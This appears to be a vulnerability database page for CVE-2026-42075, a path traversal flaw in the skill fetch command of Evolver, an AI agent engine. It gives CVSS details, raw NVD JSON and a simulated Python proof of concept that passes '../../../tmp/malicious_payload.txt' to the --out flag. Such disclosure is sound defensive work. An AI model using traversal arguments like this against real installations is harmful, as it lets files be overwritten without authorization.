Security Vulnerability Report
中文
CVE-2026-42075 CVSS 8.1 HIGH

CVE-2026-42075

Published: 2026-05-04 17:16:24
Last Modified: 2026-05-07 15:43:40
Source: [email protected]

Description

Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive location. This issue has been patched in version 1.69.3.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Evolver < 1.69.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-42075: Path Traversal in Evolver # Vulnerable versions: < 1.69.3 # This script demonstrates the path traversal vulnerability # by exploiting the '--out' flag in the skill fetch command. import sys import subprocess def exploit_poc(): target_file = "../../../tmp/malicious_payload.txt" skill_name = "example_skill" print(f"[*] Attempting to write to arbitrary path: {target_file}") # Simulating the vulnerable command execution # In a real scenario, the attacker controls the '--out' argument try: # Command structure: evolver fetch <skill> --out <path> cmd = ["evolver", "fetch", skill_name, "--out", target_file] print(f"[*] Executing: {' '.join(cmd)}") # Note: This is a simulation. Actual execution depends on environment. # result = subprocess.run(cmd, capture_output=True) print("[+] If vulnerable, the file has been written outside the intended directory.") except Exception as e: print(f"[-] Error during PoC execution: {e}") if __name__ == "__main__": exploit_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42075", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:24.283", "lastModified": "2026-05-07T15:43:39.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive location. This issue has been patched in version 1.69.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3", "source": "[email protected]"}, {"url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j", "source": "[email protected]"}, {"url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.